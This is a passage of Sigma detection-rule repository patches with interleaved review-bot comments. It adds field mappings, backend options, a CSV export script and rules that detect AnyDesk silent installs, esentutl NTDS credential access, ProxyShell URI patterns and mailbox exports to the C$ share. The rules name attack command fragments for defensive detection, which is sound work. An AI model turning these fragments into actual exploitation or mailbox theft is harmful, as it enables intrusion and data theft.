@@ -506,3 +505,43 @@ fieldmappings: SourceLine: winlog.event_data.SourceLine SourceTag: winlog.event_data.SourceTag CallStack: winlog.event_data.CallStack + # + # Microsoft-Windows-Windows Defender/Operational + # + Action ID: winlog.event_data.Action ID + Action Name: winlog.event_data.Action Name + Additional Actions ID: winlog.event_data.Additional Actions ID + Additional Actions String: winlog.event_data.Additional Actions String + Category ID: winlog.event_data.Category ID + Category Name: winlog.event_data.Category Name + Detection ID: winlog.event_data.Detection ID + Detection Time: winlog.event_data.Detection Time + Detection User: winlog.event_data.Detection User + Engine Version: winlog.event_data.Engine Version + Error Code: winlog.event_data.Error Code + Error Description: winlog.event_data.Error Description + Execution ID: winlog.event_data.Execution ID + Execution Name: winlog.event_data.Execution Name + FWLink: winlog.event_data.FWLink + New Value: winlog.event_data.New Value + Old Value: winlog.event_data.Old Value + Origin ID: winlog.event_data.Origin ID + Origin Name: winlog.event_data.Origin Name + Path: winlog.event_data.Path + Post Clean Status: winlog.event_data.Post Clean Status + Pre Execution Status: winlog.event_data.Pre Execution Status + Process Name: winlog.event_data.Process Name + Product Name: winlog.event_data.Product Name + Product Version: winlog.event_data.Product Version + Remediation User: winlog.event_data.Remediation User + Security intelligence Version: winlog.event_data.Security intelligence Version + Severity ID: winlog.event_data.Severity ID + Severity Name: winlog.event_data.Severity Name + Source ID: winlog.event_data.Source ID + Source Name: winlog.event_data.Source Name + Status Code: winlog.event_data.Status Code + Status Description: winlog.event_data.Status Description + Threat ID: winlog.event_data.Threat ID + Threat Name: winlog.event_data.Threat Name + Type ID: winlog.event_data.Type ID + Type Name: 
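Review bot: Every new mapping in this hunk targets a winlogbeat path with an embedded space, e.g. `Action ID: winlog.event_data.Action ID`; YAML accepts that as a plain scalar, but whether winlogbeat really keeps the space in the `event_data` key rather than normalising it is not established here, and it decides whether any of these mappings, and the `Source Name` lookup the AMSI rule now relies on, will match. Confirm against an indexed Defender 1116 event and record the result in the section header, e.g. `# Microsoft-Windows-Windows Defender/Operational (event_data keys keep their spaces; verified against EventID 1116)`. `Path: winlog.event_data.Path` was removed from the generic block in the previous hunk and re-added here; because the `fieldmappings` keys form one flat map that is a pure move, but the removed placement was the more general one and the move is worth a word in the commit message.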
winlog.event_data.Type Name From b7e301b6396826ea70ed82c329fc36abd8664e6d Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Fri, 6 Aug 2021 11:46:00 +0200 Subject: [PATCH 0192/1367] add field selection to sql backend option --- tools/sigma/backends/sql.py | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index bc55a1ba..cd0b8647 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -48,6 +48,8 @@ class SQLBackend(SingleTextQueryBackend): ("table", False, "Use this option to specify table name, default is \"eventlog\"", None), ) + + def __init__(self, sigmaconfig, options): super().__init__(sigmaconfig) if "table" in options: @@ -55,6 +57,11 @@ class SQLBackend(SingleTextQueryBackend): else: self.table = "eventlog" + if "select" in options: + self.select_fields = options["select"].split(',') + else: + self.select_fields = list() + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -188,13 +195,17 @@ class SQLBackend(SingleTextQueryBackend): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") result = self.generateNode(parsed.parsedSearch) + select = "*" + + if self.select_fields: + select = ", ".join(self.select_fields) if parsed.parsedAgg: #Handle aggregation fro, whe = self.generateAggregation(parsed.parsedAgg, result) - return "SELECT * FROM {} WHERE {}".format(fro, whe) + return "SELECT {} FROM {} WHERE {}".format(select, fro, whe) - return "SELECT * FROM {} WHERE {}".format(self.table, result) + return "SELECT {} FROM {} WHERE {}".format(select, self.table, result) def _recursiveFtsSearch(self, subexpression): #True: found subexpression, where no fieldname is requested -> full text search 
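Review bot: The new `select` option is read in `__init__` but is never declared in the backend's `options` tuple where `table` is; the first hunk only adds blank lines there, so the option is undocumented and, assuming that tuple is what the CLI uses to accept backend options, may not be reachable at all. Add `("select", False, "Comma-separated list of fields to select, default is *", None),` next to the `table` entry. The split value is then interpolated verbatim into `SELECT {} FROM ...`, so `a, b` yields `a,  b` and nothing stops a value that is not a column list from reshaping the statement; `self.select_fields = [f.strip() for f in options["select"].split(',') if f.strip()]` handles the whitespace and an empty string, and rejecting entries that are not plain identifiers would keep the generated SQL shaped as intended (the existing `table` option has the same property). The two blank lines inserted before `def __init__` also leave three consecutive blank lines inside the class body, more than the spacing used elsewhere in the hunk.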
@@ -228,4 +239,4 @@ class SQLBackend(SingleTextQueryBackend): if isinstance(subexpression.items, NodeSubexpression): return self._recursiveFtsSearch(subexpression.items) elif type(subexpression.items) in [ConditionAND, ConditionOR, ConditionNOT]: - return _evaluateCondition(subexpression.items) \ No newline at end of file + return _evaluateCondition(subexpression.items) From 516e1ade6d68b225fbf7224409fcf36a38cdf1dd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=A1n=20Tren=C4=8Dansk=C3=BD?= Date: Fri, 6 Aug 2021 14:06:35 +0200 Subject: [PATCH 0193/1367] Silent installation of AnyDesk --- .../win_anydesk_silent_install.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/win_anydesk_silent_install.yml diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml new file mode 100644 index 00000000..6b3ad6f0 --- /dev/null +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -0,0 +1,31 @@ +title: AnyDesk silent installation +id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 +status: experimental +author: Ján Trenčanský +date: 2021/08/06 +description: AnyDesk Remote Desktop silent installation can be used by attacker to gain remote access. +references: + - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20 + - https://support.anydesk.com/Automatic_Deployment +tags: + - attack.t1219 +logsource: + category: process_creation + product: windows +detection: + selection_anydesk: + CommandLine|contains: 'anydesk.exe' + selection_install: + CommandLine|contains: '--install' + selection_with_win: + CommandLine|contains: '--start-with-win' + selection_silent: + CommandLine|contains: '--silent' + condition: all of them +falsepositives: + - Legitimate deployment of AnyDesk +level: medium +fields: + - CommandLine + - ParentCommandLine + - CurrentDirectory From 2f3b48c347b8c7786ca12e9bb0e2a5627135a27f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?J=C3=A1n=20Tren=C4=8Dansk=C3=BD?= Date: Fri, 6 Aug 2021 14:18:30 +0200 Subject: [PATCH 0194/1367] Fix title --- rules/windows/process_creation/win_anydesk_silent_install.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index 6b3ad6f0..c3e334f9 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -1,4 +1,4 @@ -title: AnyDesk silent installation +title: AnyDesk Silent Installation id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 status: experimental author: Ján Trenčanský From e02b85dc9944b862cfc2142d551abbf6235f632e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:41:14 +0200 Subject: [PATCH 0195/1367] '--start-with-win' is pretty specific --- .../process_creation/win_anydesk_silent_install.yml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index c3e334f9..da9c8159 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -14,17 +14,14 @@ logsource: product: windows detection: selection_anydesk: - CommandLine|contains: 'anydesk.exe' - selection_install: - CommandLine|contains: '--install' - selection_with_win: - CommandLine|contains: '--start-with-win' - selection_silent: - CommandLine|contains: '--silent' + CommandLine|contains|all: + - '--install' + - '--start-with-win' + - '--silent' condition: all of them falsepositives: - Legitimate deployment of AnyDesk -level: medium +level: high fields: - CommandLine - ParentCommandLine From d69e2333c892f9fd333aa2cbaa24c464d27925b5 Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Fri, 6 Aug 2021 18:44:54 +0200 Subject: [PATCH 0196/1367] various fixes --- .../windows/process_creation/Conti_esentutl.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/Conti_esentutl.yaml index 7a29a633..91f75ab4 100644 --- a/rules/windows/process_creation/Conti_esentutl.yaml +++ b/rules/windows/process_creation/Conti_esentutl.yaml @@ -1,12 +1,12 @@ -title: Detection of esentutl aka Extensible Storage Engine Utilities to gather credentials +title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: experimental author: sam0x90 date: 2021/08/06 -description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module "pwgrab" +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - - https://attack.mitre.org/software/S0404/ + - https://attack.mitre.org/software/S0404/ - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ tags: - attack.credential_access @@ -17,16 +17,15 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains|all: - 'esentutl' - selection_password: - CommandLine|contains: ' /p' + - ' /p' condition: all of them falsepositives: - To be determined level: medium fields: - User - - CommandLine + - CommandLine - ParentCommandLine - - CurrentDirectory \ No newline at end of file + - CurrentDirectory From 7de55075f7556b07d33d0c29b3d3acd670b7f97b Mon Sep 17 00:00:00 2001 
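Review bot: After this change Conti_esentutl.yaml has a single `selection` but keeps `condition: all of them`; that still evaluates correctly, but `condition: selection` states the intent and matches the fix the same author applies to the AnyDesk rule in the following commit. The rename to process_susp_esentutl_params.yaml later on this page carries the condition over unchanged. The description also misspells the binary and needs grammar: `description: Conti recommends that its affiliates use esentutl to access a dumped NTDS file. Trickbot also uses this utility to obtain MS Edge data via its pwgrab module.`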
From: Florian Roth Date: Fri, 6 Aug 2021 18:45:38 +0200 Subject: [PATCH 0197/1367] fix: condition --- rules/windows/process_creation/win_anydesk_silent_install.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_anydesk_silent_install.yml b/rules/windows/process_creation/win_anydesk_silent_install.yml index da9c8159..4cf3b46e 100644 --- a/rules/windows/process_creation/win_anydesk_silent_install.yml +++ b/rules/windows/process_creation/win_anydesk_silent_install.yml @@ -13,12 +13,12 @@ logsource: category: process_creation product: windows detection: - selection_anydesk: + selection: CommandLine|contains|all: - '--install' - '--start-with-win' - '--silent' - condition: all of them + condition: selection falsepositives: - Legitimate deployment of AnyDesk level: high From c0360cd1cafcef2836d83d0a50bae76fb2c91f64 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 6 Aug 2021 18:53:08 +0200 Subject: [PATCH 0198/1367] change name and line breaks --- ...yaml => process_susp_esentutl_params.yaml} | 62 +++++++++---------- 1 file changed, 31 insertions(+), 31 deletions(-) rename rules/windows/process_creation/{Conti_esentutl.yaml => process_susp_esentutl_params.yaml} (96%) diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yaml similarity index 96% rename from rules/windows/process_creation/Conti_esentutl.yaml rename to rules/windows/process_creation/process_susp_esentutl_params.yaml index 91f75ab4..598525ac 100644 --- a/rules/windows/process_creation/Conti_esentutl.yaml +++ b/rules/windows/process_creation/process_susp_esentutl_params.yaml 
@@ -1,31 +1,31 @@ -title: Esentutl Gather Credentials -id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 -status: experimental -author: sam0x90 -date: 2021/08/06 -description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. -references: - - https://twitter.com/vxunderground/status/1423336151860002816 - - https://attack.mitre.org/software/S0404/ - - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ -tags: - - attack.credential_access - - attack.t1003 - - attack.t1003.003 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'esentutl' - - ' /p' - condition: all of them -falsepositives: - - To be determined -level: medium -fields: - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory +title: Esentutl Gather Credentials +id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 +status: experimental +author: sam0x90 +date: 2021/08/06 +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. +references: + - https://twitter.com/vxunderground/status/1423336151860002816 + - https://attack.mitre.org/software/S0404/ + - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ +tags: + - attack.credential_access + - attack.t1003 + - attack.t1003.003 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'esentutl' + - ' /p' + condition: all of them +falsepositives: + - To be determined +level: medium +fields: + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory From 2333defde7630a572a30616a030ec0b9713e3f97 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sat, 7 Aug 2021 08:24:36 +0200 Subject: [PATCH 0199/1367] add hash_normalise option --- tools/sigma/backends/elasticsearch.py | 41 ++++++++++++++++++++------- 1 file changed, 30 insertions(+), 11 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b00a1107..0f1a3616 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -68,6 +68,7 @@ class ElasticsearchWildcardHandlingMixin(object): ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), + ("hash_normalise", None, "Normalise hash field to lower , upper or both. If not use field is a normal field. Valid options are: lower/upper/both", None), ) reContainsWildcard = re.compile("(?:(? Date: Sat, 7 Aug 2021 02:11:11 -0500 Subject: [PATCH 0200/1367] Create azure_kubernetes_secret_or_config_object_access.yml --- ...ernetes_secret_or_config_object_access.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 00000000..b2ab6e38 --- /dev/null +++ b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml 
@@ -0,0 +1,25 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection1: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + selection2: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + selection3: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + selection4: + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection1 or selection2 or selection3 or selection4 +level: medium +tags: + - attack.impact +falsepositives: +- Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 210ca90d480de1625a10caf42229bd9afc4bfa8d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 02:11:47 -0500 Subject: [PATCH 0201/1367] Delete azure_kubernetes_secret_or_config_object_access.yml --- ...ernetes_secret_or_config_object_access.yml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml deleted file mode 100644 index b2ab6e38..00000000 --- a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml +++ /dev/null 
@@ -1,25 +0,0 @@ -title: Azure Kubernetes Secret or Config Object Access -id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c -description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. -author: Austin Songer -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection1: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE - selection2: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE - selection3: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE - selection4: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE - condition: selection1 or selection2 or selection3 or selection4 -level: medium -tags: - - attack.impact -falsepositives: -- Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1ac49a2055ac9ef0d196d4846176ae13e4d6698c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 09:22:24 +0200 Subject: [PATCH 0202/1367] rule: ProxyShell patterns --- rules/web/web_exchange_proxyshell.yml | 32 +++++++++++++++++++ .../process_mailboxexport_share.yaml | 25 +++++++++++++++ 2 files changed, 57 insertions(+) create mode 100644 rules/web/web_exchange_proxyshell.yml create mode 100644 rules/windows/process_creation/process_mailboxexport_share.yaml diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml new file mode 100644 index 00000000..2b19fe2b --- /dev/null +++ b/rules/web/web_exchange_proxyshell.yml 
@@ -0,0 +1,32 @@ +title: Exchange ProxyShell Pattern +id: 23eee45e-933b-49f9-ae1b-df706d2d52ef +status: experimental +description: Detects URP patterns that could be found in ProxyShell exloitation attempts against Exchange servers +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Florian Roth +date: 2020/08/07 +tags: + - attack.initial_access +logsource: + category: webserver + +detection: + selection1: + c-uri|contains|all: + - '/autodiscover/autodiscover.json?' + - '%3f@' + selection2: + c-uri|contains: + # since we don't know how it will appear in the log files, we'll just use all versions + - 'autodiscover.json?@' + - 'autodiscover.json%3f@' + - '%3f@foo.com' + - 'Email=autodiscover/autodiscover.json' + - 'json?@foo.com' + - 'autodiscover.json?@' + condition: 1 of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/process_mailboxexport_share.yaml b/rules/windows/process_creation/process_mailboxexport_share.yaml new file mode 100644 index 00000000..77bc04c2 --- /dev/null +++ b/rules/windows/process_creation/process_mailboxexport_share.yaml @@ -0,0 +1,25 @@ +title: Suspicious MailboxExport to Share +id: 889719ef-dd62-43df-86c3-768fb08dc7c0 +status: experimental +description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations +references: + - https://youtu.be/5mqid-7zp8k?t=2481 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Florian Roth +date: 2021/08/07 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'New-MailboxExport' + - ' -Mailbox ' + - ' -FilePath \\127.0.0.1\C$' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - CommandLine + - ParentCommandLine 
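Review bot: `date: 2020/08/07` in web_exchange_proxyshell.yml is a year off: the commit and the companion rule created alongside it are dated 2021/08/07, and the fix commit further down this page keeps `2020/08/07` as a context line, so it is never corrected. Change it to `date: 2021/08/07`. The description carries two typos, `URP` for `URI` and `exloitation`: `description: Detects URI patterns that could be found in ProxyShell exploitation attempts against Exchange servers`.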
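Review bot: process_mailboxexport_share.yaml has no `tags:` block, while the web rule created in the same commit carries `attack.initial_access`; the two are presented as a pair for the same campaign, so the mailbox export rule should be classified too, e.g. `tags:` with `- attack.collection` and `- attack.t1114` (Email Collection) if that is the intended mapping. The `.yaml` extension also differs from the `.yml` used by the other rules on this page; the rename commit that follows takes care of that.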
From 5f89a29ea7c89fc365f570df4ddc2cfe0c9ee906 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 10:01:23 +0200 Subject: [PATCH 0203/1367] fix file name --- ...s_mailboxexport_share.yaml => process_mailboxexport_share.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_mailboxexport_share.yaml => process_mailboxexport_share.yml} (100%) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yaml b/rules/windows/process_creation/process_mailboxexport_share.yml similarity index 100% rename from rules/windows/process_creation/process_mailboxexport_share.yaml rename to rules/windows/process_creation/process_mailboxexport_share.yml From 0a8904a61e7448ed41d63ff9bd0d076e1d634cba Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 10:10:12 +0200 Subject: [PATCH 0204/1367] fix: issues with new rule --- rules/web/web_exchange_proxyshell.yml | 5 ++-- .../process_mailboxexport_share.yml | 26 +++++++++++++++++++ 2 files changed, 28 insertions(+), 3 deletions(-) create mode 100644 rules/windows/process_creation/process_mailboxexport_share.yml diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index 2b19fe2b..a838600a 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml 
@@ -5,18 +5,18 @@ description: Detects URP patterns that could be found in ProxyShell exloitation references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 author: Florian Roth date: 2020/08/07 tags: - attack.initial_access logsource: category: webserver - detection: selection1: c-uri|contains|all: - '/autodiscover/autodiscover.json?' - - '%3f@' + - '/powershell' selection2: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions @@ -25,7 +25,6 @@ detection: - '%3f@foo.com' - 'Email=autodiscover/autodiscover.json' - 'json?@foo.com' - - 'autodiscover.json?@' condition: 1 of them falsepositives: - Unknown diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml new file mode 100644 index 00000000..cf828c85 --- /dev/null +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -0,0 +1,26 @@ +title: Suspicious MailboxExport to Share +id: 889719ef-dd62-43df-86c3-768fb08dc7c0 +status: experimental +description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations +references: + - https://youtu.be/5mqid-7zp8k?t=2481 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth +date: 2021/08/07 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'New-MailboxExport' + - ' -Mailbox ' + - ' -FilePath \\127.0.0.1\C$' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - CommandLine + - ParentCommandLine 
From 88a721a1ab39c2264a499d3cb2a7405e96ee361c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 7 Aug 2021 10:13:05 +0200 Subject: [PATCH 0205/1367] docs: add space in title --- rules/windows/process_creation/process_mailboxexport_share.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index cf828c85..da6aba61 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -1,4 +1,4 @@ -title: Suspicious MailboxExport to Share +title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: experimental description: Detects a PowerShell New-MailboxExportRequest that exports a mailbox to a local share, as used in ProxyShell exploitations From f7d116a4722bc3da25edce88a61cb9b3fd58a2b2 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Sat, 7 Aug 2021 10:32:12 +0200 Subject: [PATCH 0206/1367] Add a sigma2CSV tool to convert rules to CSV for stats purpose #1787 --- contrib/sigma2CSV.py | 63 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 contrib/sigma2CSV.py diff --git a/contrib/sigma2CSV.py b/contrib/sigma2CSV.py new file mode 100644 index 00000000..b2c99d66 --- /dev/null +++ b/contrib/sigma2CSV.py 
@@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +# Copyright 2021 wagga40 (https://github.com/wagga40) +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +""" +Project: sigma2CSV.py +Date: 07 aug 2021 +Author: wagga40 (https://github.com/wagga40) +Version: 1.0 +Description: + Asked by frak113 in issue #1787 (https://github.com/SigmaHQ/sigma/issues/1787#issuecomment-894618060) + This script converts sigma rules to a CSV format for statistics puprpose. + For now, it only keeps title, description, level, tags and author fields. + Feel free to modify it according to your needs. +Requirements: + $ pip install pyyaml +""" + +import yaml +import glob +import argparse + +parser = argparse.ArgumentParser() +parser.add_argument("-r", "--rulesdirectory", help="Sub-directory generated by rules-search", required=True, type=str) +parser.add_argument("-f", "--fileext", help="Rule file extension", default="yml", type=str) +parser.add_argument("-d", "--delimiter", help="Separator", default=",", type=str) +parser.add_argument("--oneline", help="Put all tags on a single line", action="store_true") +args = parser.parse_args() + +files = glob.glob(args.rulesdirectory + "/**/*." 
+ args.fileext, recursive=True) +# for each file in the given directory +for file in files: + d={} + with open(file, 'r') as stream: + docs = yaml.load_all(stream, Loader=yaml.FullLoader) + for doc in docs: + for k,v in doc.items(): + if k in ['title','description','tags','level','author']: # Modify here if you want to include other fields + d[k]=v + # Check for optional fields + if "author" not in d: d["author"]="" + if "level" not in d: d["level"]="" + if args.oneline: # All tags will be on a single line + if "tags" in d: + expandTags = args.delimiter.join([ tags for tags in d["tags"] if "attack" in tags ]) # Only output attack related tags + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}{args.delimiter}{expandTags}') + else: + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}') + else: + if "tags" in d: + for tag in d["tags"]: + if "attack" in tag: # Only output attack related tags + print(f'{d["title"]}{args.delimiter}{d["description"]}{args.delimiter}{d["level"]}{args.delimiter}{d["author"]}{args.delimiter}{tag}') \ No newline at end of file From f6980edc66373f1c613da074746aaccc0a72adbb Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 7 Aug 2021 11:16:24 +0200 Subject: [PATCH 0207/1367] fix english : normalize --- tools/sigma/backends/elasticsearch.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 0f1a3616..e19fa104 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py 
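Review bot: The output rows are built with f-strings joined by `args.delimiter`, so any `title` or `description` containing the delimiter (a comma is common in descriptions) produces misaligned columns, and a rule without a `title` or `description` key raises `KeyError` at the print. Writing rows through `csv.writer(sys.stdout, delimiter=args.delimiter)` quotes fields correctly and `d.get(...)` replaces the optional-field checks; the rewrite below also switches to `yaml.safe_load_all`, which is sufficient for rule files and does not construct arbitrary Python objects the way `FullLoader` can, and skips empty YAML documents that would otherwise fail on `doc.items()`. `import csv` and `import sys` belong next to the existing imports; the argparse setup above the loop is unchanged.
```python
files = glob.glob(args.rulesdirectory + "/**/*." + args.fileext, recursive=True)
writer = csv.writer(sys.stdout, delimiter=args.delimiter)
fields = ['title', 'description', 'tags', 'level', 'author']  # Modify here if you want to include other fields
# for each file in the given directory
for file in files:
    d = {}
    with open(file, 'r', encoding='utf-8') as stream:
        # safe_load_all is enough for rule files and never instantiates arbitrary objects
        for doc in yaml.safe_load_all(stream):
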